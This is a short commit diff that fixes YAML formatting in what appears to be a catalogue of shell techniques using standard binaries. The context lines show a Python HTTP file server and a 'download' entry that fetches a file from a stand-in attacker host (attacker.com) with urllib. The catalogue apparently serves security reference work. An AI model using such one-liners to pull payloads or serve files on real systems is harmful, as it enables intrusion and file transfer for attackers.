Fix YAMLs format

This commit is contained in:
Andrea Cardaci
2018-06-01 00:20:23 +02:00
parent bdf78c5e99
commit b96f6e9a49
11 changed files with 14 additions and 14 deletions

View File

@@ -18,7 +18,7 @@ functions:
python2 -m SimpleHTTPServer $LPORT
download:
- description: Fetch a remote file via HTTP GET request.
code: |-
code: |
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'